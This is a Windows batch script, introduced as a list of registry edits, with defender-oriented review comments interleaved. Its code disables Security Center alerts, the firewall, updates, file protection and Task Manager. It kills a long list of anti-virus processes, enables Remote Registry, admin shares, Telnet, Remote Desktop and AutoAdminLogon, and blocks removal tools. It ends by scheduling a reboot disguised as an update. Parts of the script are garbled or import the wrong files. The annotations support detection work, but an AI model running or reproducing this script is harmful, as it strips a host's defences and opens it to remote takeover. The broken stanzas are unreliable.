Here is a list of registry edits; read the notes written above them to understand what they do. Feel free to edit it.
Setting Meaning
dword:00000002 Automatic
dword:00000003 Manual
dword:00000004 Disabled
CODE
@ECHO OFF
:: ----------------------------------------------------------------------
:: Review note, defensive summary: this batch file reverses Windows
:: XP-era security defaults rather than hardening anything, so its
:: presence or execution on a host is best read as an indicator of
:: compromise. In order it:
::   1. suppresses Security Center alerts and disables Windows Firewall,
::      ICS, Automatic Updates, Help and Support, Windows File Protection,
::      IPsec and Task Manager by writing .reg files under TEMP and
::      importing them silently with REGEDIT /S
::   2. stops and kills a long list of anti-virus and firewall products
::      with "net stop" and "tskill"
::   3. turns on Remote Access, administrative shares, Remote Registry,
::      Messenger, Telnet Server with NTLM, Terminal Services and
::      AutoAdminLogon, then tries to block security tools via DisallowRun
::   4. deletes its .reg files and schedules a shutdown with AT
:: Service "Start" values use the usual SCM encoding: 2 Automatic,
:: 3 Manual, 4 Disabled.
:: Detection: silent REGEDIT /S imports of files under TEMP, bursts of
:: net stop / tskill aimed at security products, Start=4 written for
:: wuauserv, SharedAccess and PolicyAgent, fDenyTSConnections=0,
:: AutoAdminLogon=1, DisableTaskMgr=1 and DisallowRun entries naming
:: security tools. Mitigation: restore the touched keys and services from
:: a known-good baseline and rebuild the host if it cannot be trusted.
:: ----------------------------------------------------------------------
REM [akinova]
:: Short aliases for the commands used throughout. Only the expanded
:: commands reach the OS, so process and command-line telemetry still
:: sees "net stop" and "tskill"; the aliases only defeat naive static
:: string matching on this file. The "c" alias for copy is never used
:: in the visible script.
set e=echo
set k=tskill
set c=copy
set s=net stop
:::: Regedit Security ::::
:: Section 1, weaken local security controls. Each stanza typically
:: writes a REGEDIT4 file under TEMP and imports it with START /WAIT
:: REGEDIT /S so no prompt is shown.
:: Override Security Center ::
:: Defender note: these values silence the Security Center warnings for
:: missing anti-virus, firewall and updates, so the user gets no visual
:: cue when the later stanzas disable those services.
%e% REGEDIT4 > %tmp%\fir1.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center] >> %tmp%\fir1.reg
%e% AntiVirusDisableNotify = "dword:00000001" >> %tmp%\fir1.reg
%e% FirewallDisableNotify = "dword:00000001" >> %tmp%\fir1.reg
%e% AntiVirusOverride = "dword:00000001" >> %tmp%\fir1.reg
%e% FirewallOverride = "dword:00000001" >> %tmp%\fir1.reg
%e% UpdatesDisableNotify = "dword:00000001" >> %tmp%\fir1.reg
START /WAIT REGEDIT /S "%tmp%\fir1.reg"
:: Disable the System’s Firewall for both the Domain and standard Profiles ::
:: Defender note: these are the Group Policy firewall keys; a policy
:: value of EnableFirewall=0 here overrides whatever the local firewall
:: UI shows, so check this path when the firewall silently stays off.
%e% REGEDIT4 > fir2.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile] >> %tmp%\fir2.reg
%e% "Start"="dword:00000000" >> fir2.reg
%e% HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile] >> %tmp%\fir2.reg
%e% EnableFirewall = "dword:00000000" >> %tmp%\fir2.reg
START /WAIT REGEDIT /S "%tmp%\fir2.reg"
:: Windows XP disables the automatic update for Service Pack 2 ::
:: Defender note: DoNotAllowXPSP2 blocks delivery of XP SP2, the service
:: pack that introduced the Security Center and the on-by-default firewall.
%e% REGEDIT4 > %tmp%\fir3.reg
%e% HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate >> %tmp%\fir3.reg
%e% DoNotAllowXPSP2 = "dword:00000001" >> %tmp%\fir3.reg
START /WAIT REGEDIT /S "%tmp%\fir3.reg"
:: Disables built-in Firewall ::
:: Defender note: ALG is the Application Layer Gateway service used by
:: ICS and the firewall for protocol helpers; Start=4 disables it.
%e% REGEDIT4 > %tmp%\fir4.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ALG] >> %tmp%\fir4.reg
%e% "Start"=dword:00000004 >> %tmp%\fir4.reg
START /WAIT REGEDIT /S "%tmp%\fir4.reg"
:: Disables applications to send error reports to Microsoft if/when they crash ::
%e% REGEDIT4 > %tmp%\fir5.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc] >> %tmp%\fir5.reg
%e% "Start"=dword:00000003 >> %tmp%\fir5.reg
START /WAIT REGEDIT /S "%tmp%\fir5.reg"
:: Disables the XP Built-in Help and Support Center to run ::
%e% REGEDIT4 > %tmp%\fir6.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\helpsvc] >> %tmp%\fir6.reg
%e% "Start"=dword:00000004 >> %tmp%\fir6.reg
START /WAIT REGEDIT /S "%tmp%\fir6.reg"
:: Disables the Microsoft Firewall ::
%e% REGEDIT4 > %tmp%\fir7.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ICFS] >> %tmp%\fir7.reg
%e% "Start"=dword:00000004 >> %tmp%\fir7.reg
START /WAIT REGEDIT /S "%tmp%\fir7.reg"
:: Disables ability to use the WindowsUpdate website ::
:: Defender note: wuauserv is the Automatic Updates service itself, so
:: Start=4 stops all update delivery, not only the web site. An XP host
:: with wuauserv disabled and Security Center notifications suppressed
:: is a classic post-compromise state.
%e% REGEDIT4 > %tmp%\fir8.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >> %tmp%\fir8.reg
%e% "Start"=dword:00000004 >> %tmp%\fir8.reg
START /WAIT REGEDIT /S "%tmp%\fir8.reg"
:: Disable Firewall And Updates ::
:: Defender note: SharedAccess is the Windows Firewall / ICS service;
:: this stanza repeats the wuauserv change from the previous one.
%e% REGEDIT4 > %tmp%\fir9.reg >> %tmp%\fir9.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >> %tmp%\fir9.reg
%e% "Start"=dword:00000004 >> %tmp%\fir9.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >> %tmp%\fir9.reg
%e% "Start"=dword:00000004 >> %tmp%\fir9.reg
START /WAIT REGEDIT /S "%tmp%\fir9.reg"
:: Lowers the Internet Security (IE) settings ::
:: Defender note: Zones\2 is the Internet Explorer Trusted Sites zone and
:: the numeric names are URL action ids; 0 allows the action silently,
:: 1 prompts, 3 disables. Unexpected 0 values for ActiveX and scripting
:: actions in a per-user zone are worth alerting on.
%e% REGEDIT4 > %tmp%\fir10.reg
%e% [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] >> %tmp%\fir10.reg
%e% 1206 = "0" >> %tmp%\fir10.reg
%e% 1806 = "0" >> %tmp%\fir10.reg
%e% 1807 = "0" >> %tmp%\fir10.reg
%e% 1808 = "0" >> %tmp%\fir10.reg
%e% 1809 = "3" >> %tmp%\fir10.reg
%e% 2000 = "0" >> %tmp%\fir10.reg
%e% 2001 = "0" >> %tmp%\fir10.reg
%e% 2004 = "0" >> %tmp%\fir10.reg
%e% 2100 = "0" >> %tmp%\fir10.reg
%e% 2101 = "1" >> %tmp%\fir10.reg
%e% 2102 = "0" >> %tmp%\fir10.reg
%e% 2200 = "0" >> %tmp%\fir10.reg
%e% 2201 = "0" >> %tmp%\fir10.reg
%e% 2300 = "1" >> %tmp%\fir10.reg
START /WAIT REGEDIT /S "%tmp%\fir10.reg"
:: Disable File Protection On Reboot ::
:: Defender note: SFCDisable turns off Windows File Protection so that
:: replaced or patched system binaries are no longer restored from the
:: cache; any non-zero value here on a production host deserves a look.
%e% REGEDIT4 > %tmp%\fir11.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> %tmp%\fir11.reg
%e% "SFCDisable"=dword:FFFFFF9D >> %tmp%\fir11.reg
START /WAIT REGEDIT /S "%tmp%\fir5.reg"
:: Disable Task Manager ::
:: Defender note: DisableTaskMgr=1 under the per-user Policies key removes
:: the user's ability to see or end processes, a common tamper-resistance
:: step. Clearing it is usually the first manual recovery action.
%e% REGEDIT4 > %tmp%\fir12.reg
%e% [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %tmp%\fir12.reg
%e% "DisableTaskMgr"=dword:00000001 >> %tmp%\fir12.reg
START /WAIT REGEDIT /S "%tmp%\fir12.reg"
:: kill list av's ::
:: Section 2, stop services and kill processes of anti-virus, firewall
:: and anti-spyware products. The net stop lines use service display
:: names or short names; the tskill lines use executable base names, and
:: tskill AV* is a wildcard. For defenders this list doubles as a
:: watch-list: a net stop or tskill against any of these names from a
:: cmd.exe or batch parent is high-signal. A few entries are not security
:: products at all, for example mscorsvw, wmiprvse, qttask, msmsgs and the
:: very broad names update, patch, ca and vir, so collateral terminations
:: of unrelated processes are also part of the footprint.
%s% "NORTON"
%s% "Norton AntiVirus Server"
%s% "Norton Internet Security"
%s% "Norton Personal Firewall 2001"
%s% "Norton Personal Firewall 2002"
%s% "Norton Personal Firewall 2003"
%s% "Norton Personal Firewall 2004"
%s% "Norton Personal Firewall 2005"
%s% "Norton Personal Firewall 2006"
%s% "Norton Personal Firewall 2007"
%s% "Norton Personal Firewall 2008"
%s% "MCAFEE"
%s% "McAfee Network Agent"
%s% "McAfee Proxy Service"
%s% "McAfee Real-time Scanner"
%s% "McAfee Services"
%s% "McAfee SystemGuards"
%s% "McAfee Personal Firewall Service"
%s% "McAfee Firewall"
%s% "McAfee Internet Guard Dog Pro"
%s% "Moolive.exe"
%s% "Mpftray.exe"
%s% "Zonealarm"
%s% "Zonealarm.exe"
%s% "LOCKDOWN2000"
%s% "SAFEWEB"
%s% "WEBSCANX"
%s% "ANTIVIR"
%s% "LOCKDOWN2000"
%s% "Lockdown2000.exe"
:: Defender note: the next three stop the built-in firewall / ICS service,
:: the Security Center service and SharedAccess by name, in addition to
:: the Start=4 registry changes made in Section 1.
%s% "Windows Firewall/Internet Connection Sharing (ICS)"
%s% "SiteAdvisor Service"
%s% "Security Center"
%s% "SharedAccess"
%k% NMain
%k% nod32
%k% AV*
%k% avcenter
%k% avconfig
%k% avscan
%k% avguard
%k% avgnt
%k% update
%k% preupd
%k% avcmd
%k% avesvc
%k% kav
%k% kavsvc
%k% kavsend
%k% keymanager
%k% agentsvr
%k% avgcc
%k% avgupsvc
%k% avgamsvr
%k% vsserv
%k% bdss
%k% xcommsvr
%k% bdnagent
%k% bdoesrv
%k% bdmcon
%k% bdswitch
%k% rtvr
%k% bdsubmit
%k% bdlite
%k% agentsvr
%k% tmproxy
%k% PcCtlCom
%k% pccguide
%k% qttask
%k% patch
%k% Tmntsrv
%k% PccPrm
%k% DrWebUpW
%k% spidernt
%k% DrWebScd
%k% DrWeb32w
%k% drwadins
%k% mcupdui
%k% McTskshd
%k% McAppIns
%k% mghtml
%k% McShield
%k% Mcdetect
%k% McVSEscn
%k% oasclnt
%k% mcvsshld
%k% ad-watch
%k% aluschedulersvc
%k% apvxdwin
%k% avciman
%k% avengine
%k% avp
%k% ca
%k% caissdt
%k% cavrid
%k% cavtray
%k% ccapp
%k% ccetvmgr
%k% ccproxy
%k% ccsetmgr
%k% dpasnt
%k% firewallntservice
%k% fsaw
%k% fsguidll
%k% fsm32
%k% fspex
%k% hsockpe
%k% isafe
%k% kav
%k% kavpf
%k% mcagent
%k% mcdetect
%k% mcshield
%k% mctskshd
%k% mcupdate
%k% mcupdmgr
%k% mcvsescn
%k% mcvsshld
%k% mpeng
%k% mpfagent
%k% mpfservice
%k% mpftray
%k% msascui
%k% mscifapp
%k% mscorsvw
%k% msfwsvc
%k% mskagent
%k% msksrvr
%k% msmpsvc
%k% msmsgs
%k% mxtask
%k% navapsvc
%k% nscsrvce
%k% oasclnt
%k% pavfnsvr
%k% pavprsrv
%k% pavsrv51
%k% pnmsrv
%k% psimsvc
%k% pskmssvc
%k% sdhelp
%k% sndsrvc
%k% spbbcsvc
%k% spysweeper
%k% spysweeperui
%k% srvload
%k% ssu
%k% swdoctor
%k% symlcsvc
%k% tpsrv
%k% tsantispy
%k% vir
%k% vrfwsvc
%k% vrmonnt
%k% vrmonsvc
%k% vsmon
%k% wdfdataservice
%k% webproxy
%k% webrootdesktopfirewall
%k% winssnotify
%k% wmiprvse
%k% zlclient
:::: Regedit Remote and Connection ::
:: Section 3, expose the host. Unlike Section 1 this part switches
:: services on: Remote Access, SharedAccess, administrative shares,
:: Remote Registry, Messenger, LmHosts, BITS, Telnet Server, Terminal
:: Services, multiple TS sessions and AutoAdminLogon. The IPsec Policy
:: Agent and SENS are disabled first so policy-based filtering and
:: connectivity-change notifications do not interfere.
:: Disables IPSEC capabilities (secure TCP/IP) ::
%e% REGEDIT4 > %tmp%\rc1.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PolicyAgent] >> %tmp%\rc1.reg
%e% "Start"=dword:00000004 >> %tmp%\rc1.reg
START /WAIT REGEDIT /S "%tmp%\fir1.reg"
:: Disables the computer to be aware of network connectivty interruptions ::
%e% REGEDIT4 > %tmp%\rc2.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS] >> %tmp%\rc2.reg
%e% "Start"=dword:00000004 >> %tmp%\rc2.reg
START /WAIT REGEDIT /S "%tmp%\rc2.reg"
:: Enable remote access ::
%e% REGEDIT4 > %tmp%\rc2.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess] >> %tmp%\rc2.reg
%e% "Start"=dword:00000001 >> %tmp%\rc2.reg
START /WAIT REGEDIT /S "%tmp%\rc2.reg"
:: Enable Shared access ::
:: Defender note: SharedAccess was set to 4 in Section 1 and is set back
:: to 1 here, presumably for the ICS side of the service; the net effect
:: depends on which import ran last. Verify the live value rather than
:: inferring it from the script.
%e% REGEDIT4 > %tmp%\rc3.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >> %tmp%\rc3.reg
%e% "Start"=dword:00000001 >> %tmp%\rc3.reg
START /WAIT REGEDIT /S "%tmp%\rc3.reg"
:: Enable administrative shares ::
:: Defender note: AutoShareWks=1 re-creates the hidden C$ / ADMIN$ shares
:: on a workstation. DisableDynamicUpdate=1 stops the host registering
:: its own name in DNS.
%e% REGEDIT4 > %tmp%\rc4.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters] >> %tmp%\rc4.reg
%e% "AutoShareWks"=dword:00000001 >> %tmp%\rc4.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters] >> %tmp%\rc4.reg
:: NOTE(review): hard-coded DNS suffix search list naming a specific
:: university network; this looks copied from an unrelated admin script
:: and is a distinctive artifact if the same value turns up elsewhere.
%e% "SearchList"="sph.umich.edu,umich.edu,itd.umich.edu" >> %tmp%\rc4.reg
%e% "DisableDynamicUpdate"=dword:00000001 >> %tmp%\rc4.reg
START /WAIT REGEDIT /S "%tmp%\rc4.reg"
:: Allows for multiple users on a single machine without requiring you to log out ::
%e% REGEDIT4 > %tmp%\rc5.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FastUserSwitchingCompatibility] >> %tmp%\rc5.reg
%e% "Start"=dword:00000002 >> %tmp%\rc5.reg
START /WAIT REGEDIT /S "%tmp%\rc5.reg"
:: Allows remote access and control of the local computer ::
%e% REGEDIT4 > %tmp%\rc6.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDSessMgr] >> %tmp%\rc6.reg
%e% "Start"=dword:00000002 >> %tmp%\rc6.reg
START /WAIT REGEDIT /S "%tmp%\rc6.reg"
:: Allows remote access and control of the Windows registry ::
:: Defender note: RemoteRegistry=Automatic on a workstation is a common
:: lateral-movement enabler and a reliable thing to baseline.
%e% REGEDIT4 > %tmp%\rc7.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >> %tmp%\rc7.reg
%e% "Start"=dword:00000002 >> %tmp%\rc7.reg
START /WAIT REGEDIT /S "%tmp%\rc7.reg"
:: Enables Messenger Auto ::
%e% REGEDIT4 > %tmp%\rc8.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Messenger] >> %tmp%\rc8.reg
%e% "Start"=dword:00000002 >> %tmp%\rc8.reg
START /WAIT REGEDIT /S "%tmp%\rc8.reg"
:: Enables NetBIOS over TCP/IP (NetBT) services ::
%e% REGEDIT4 > %tmp%\rc9.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LmHosts] >> %tmp%\rc9.reg
%e% "Start"=dword:00000002 >> %tmp%\rc9.reg
START /WAIT REGEDIT /S "%tmp%\rc9.reg"
:: Allows you to resume file transfers on slow connections ::
%e% REGEDIT4 > %tmp%\rc10.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS] >> %tmp%\rc10.reg
%e% "Start"=dword:00000002 >> %tmp%\rc10.reg
START /WAIT REGEDIT /S "%tmp%\rc10.reg"
:: Enable Telnet As Server ::
:: Defender note: this stanza sets the Telnet service to Automatic with
:: NTLM authentication and TelnetPort=0xffff, i.e. TCP 65535. A Telnet
:: listener on that port, or tlntsvr.exe running at all on a workstation,
:: is a distinctive network and host indicator. The lines below are
:: partly garbled, so verify the live registry rather than the script.
%e% REGEDIT4 > %tmp%\rc11.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr] >> %tmp%\rc11.reg
%e% "ErrorControl"=dword:00000001 >> %tmp%\rc11.reg
%e% "Start"=dword:00000002 >> %tmp%\rc11.reg
%e% "Type"=dword:00000010 >> %tmp%\rc11.reg
>> "%tmp%\rc11.reg" %e% "FailureActions"=hex&
#58;00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,e
a,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >> %tmp%\rc11.reg
%e% >>"%Temp%.\tel.reg" ECHO "NTLM"=dword:00000001 >> %tmp%\rc11.reg
%e% >>"%Temp%.\tel.reg" ECHO "TelnetPort"=dword:0000ffff >> %tmp%\rc11.reg
START /WAIT REGEDIT /S "%tmp%\rc11.reg"
DEL "%tmp%\rc11.reg"
:: Enable TermSercvice ::
:: Defender note: the keys below open Remote Desktop and Remote
:: Assistance, allow multiple TS sessions and request AutoAdminLogon.
:: fDenyTSConnections=0 together with AutoAdminLogon=1 on a host that
:: was not provisioned that way is a strong alert condition. The same
:: Terminal Server values are written several times; only the last
:: import matters.
%e% Windows Registry Editor Version 5.00 > %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc12.reg
%e% "fDenyTSConnections"=dword:00000000 >> %tmp%\rc12.reg
%e% "fAllowToGetHelp"=dword:00000001 >> %tmp%\rc12.reg
regedit /s %tmp%\rc12.reg
del %tmp%\rc12.reg
%e% Windows Registry Editor Version 5.00 > %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >> %tmp%\rc12.reg
%e% "Start"=dword:00000002 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc12.reg
%e% "AllowTSConnections"=dword:00000001 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc12.reg
%e% "fDenyTSConnections"=dword:00000000 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc12.reg
%e% "fAllowToGetHelp"=dword:00000001 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> %tmp%\rc12.reg
%e% "AllowMultipleTSSessions"=dword:00000001 >> %tmp%\rc12.reg
%e% [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> %tmp%\rc12.reg
%e% "AutoAdminLogon"="1" >> %tmp%\rc12.reg
REGEDIT /S %tmp%\rc12.reg
REGEDIT -S %tmp%\rc12.reg
:: Defender note: sysocmgr is driven with an unattended answer file
:: written to the root of C: and deleted right after, so the on-disk
:: artifact is short-lived; the Terminal Services component install it
:: requests leaves setup log entries that outlive the file.
%e% [Components] > c:\bootlog~.txt
%e% TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL c:\bootlog~.txt
:: RemoteDesktop Enable on WinXP ::
%e% REGEDIT4 > %tmp%\rc13.reg
%e% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> %tmp%\rc13.reg
%e% "fDenyTSConnections"=dword:00000000 >> %tmp%\rc13.reg
%e% "fAllowToGetHelp"=dword:00000001 >> %tmp%\rc13.reg
START /WAIT REGEDIT /S "%tmp%\rc13.reg"
:: Create A Disallow Executables List :: Gets detected as harmfull reg but i have alredy disabled message and av ::
:: Section 4, intended to block security and removal tools from
:: launching. DisallowRun=1 under the per-user Explorer policies key
:: activates the DisallowRun list; the intent of the second stanza is to
:: populate it with anti-virus binaries and common cleanup tools such as
:: HijackThis, ComboFix, SUPERAntiSpyware and OTScanIt. From a response
:: standpoint this key is why cleanup tools can refuse to start on an
:: affected host, and clearing it is usually the first recovery step.
:: The author's own comment above acknowledges that this .reg content is
:: flagged by anti-virus, which is itself a useful detection signature.
%e% REGEDIT4 > %Tmp%\diss.reg
%e% [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %Tmp%\diss.reg
%e% "DisallowRun"=dword:00000001 >> %Tmp%\diss.reg >> %Tmp%\diss.reg
START /WAIT REGEDIT /S "%Tmp%\diss.reg"
DEL "%Tmp%\diss.reg"
:: Add Executables To Be Blocked From Running ::
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\DisallowRun]
%e% "0"="lockdown.exe" >> %Tmp%\diss2.reg
%e% "1"="lockdown2000.exe" >> %Tmp%\diss2.reg
%e% "2"="zonealarm.exe" >> %Tmp%\diss2.reg
%e% "3"="NMain.exe" >> %Tmp%\diss2.reg
%e% "4"="AV*.exe" >> %Tmp%\diss2.reg
%e% "5"="nod32.exe" >> %Tmp%\diss2.reg
%e% "6"="Avcenter.exe" >> %Tmp%\diss2.reg
%e% "7"="SUPERAntiSpyware.exe" >> %Tmp%\diss2.reg
%e% "8"="Hijackthis.exe" >> %Tmp%\diss2.reg
%e% "9"="SiteAdv.exe" >> %Tmp%\diss2.reg
%e% "10"="Mcshield.exe" >> %Tmp%\diss2.reg
%e% "11"="Mcproxy.exe" >> %Tmp%\diss2.reg
%e% "12"="combofix.exe" >> %Tmp%\diss2.reg
%e% "13"="Mcdetect.exe" >> %Tmp%\diss2.reg
%e% "14"="avguard.exe" >> %Tmp%\diss2.reg
%e% "15"="avgnt.exe" >> %Tmp%\diss2.reg
%e% "16"="kav.exe" >> %Tmp%\diss2.reg
%e% "17"="kavsvc.exe" >> %Tmp%\diss2.reg
%e% "18"="kavsend.exe" >> %Tmp%\diss2.reg
%e% "19"="agentsvr.exe" >> %Tmp%\diss2.reg
%e% "20"="mcvsshld.exe" >> %Tmp%\diss2.reg
%e% "21"="OTscan.exe" >> %Tmp%\diss2.reg
%e% "22"="OTscanit.exe" >> %Tmp%\diss2.reg
%e% "23"="avsynmgr.exe" >> %Tmp%\diss2.reg
%e% "24"="avosynmgr.exe" >> %Tmp%\diss2.reg
%e% "25"="mcvsescn.exe" >> %Tmp%\diss2.reg
%e% "26"="mctskshd.exe" >> %Tmp%\diss2.reg
%e% "27"="MCUpdate.exe" >> %Tmp%\diss2.reg
%e% "38"="McAgent.exe" >> %Tmp%\diss2.reg
%e% "39"="McVsRte.exe" >> %Tmp%\diss2.reg
%e% "30"="McRegWiz.exe" >> %Tmp%\diss2.reg
%e% "31"="ccapp.exe" >> %Tmp%\diss2.reg
START /WAIT REGEDIT /S "%Temp%\diss2.reg"
:: Delete Used Registry Files ::
:: Section 5, cleanup and activation. Removing the .reg files leaves only
:: the registry state and the shell history as evidence, so triage should
:: focus on the keys listed at the top of this file and on Service Control
:: Manager and scheduled-task events rather than on files under TEMP.
del %tmp%\fir1.reg
del %tmp%\fir2.reg
del %tmp%\fir3.reg
del %tmp%\fir4.reg
del %tmp%\fir5.reg
del %tmp%\fir6.reg
del %tmp%\fir7.reg
del %tmp%\fir8.reg
del %tmp%\fir9.reg
del %tmp%\fir10.reg
del %tmp%\fir11.reg
del %tmp%\fir12.reg
del %tmp%\rc1.reg
del %tmp%\rc2.reg
del %tmp%\rc3.reg
del %tmp%\rc4.reg
del %tmp%\rc5.reg
del %tmp%\rc6.reg
del %tmp%\rc7.reg
del %tmp%\rc8.reg
del %tmp%\rc9.reg
del %tmp%\rc10.reg
del %tmp%\rc11.reg
del %tmp%\rc12.reg
del %tmp%\rc13.reg
del %tmp%\diss2.reg
:: Shutdown pc AT 12:00AM to refresh updated system registry ::
:: Defender note: the AT job reboots the machine at midnight so the
:: changed service Start values take effect, and the shutdown message
:: presents this as update installation. An AT-scheduled shutdown.exe
:: with a custom comment is itself a small but specific indicator.
AT 12:00AM Shutdown -s -t 5 -c "System Must Be Rebooted For Full Installation Of Updates"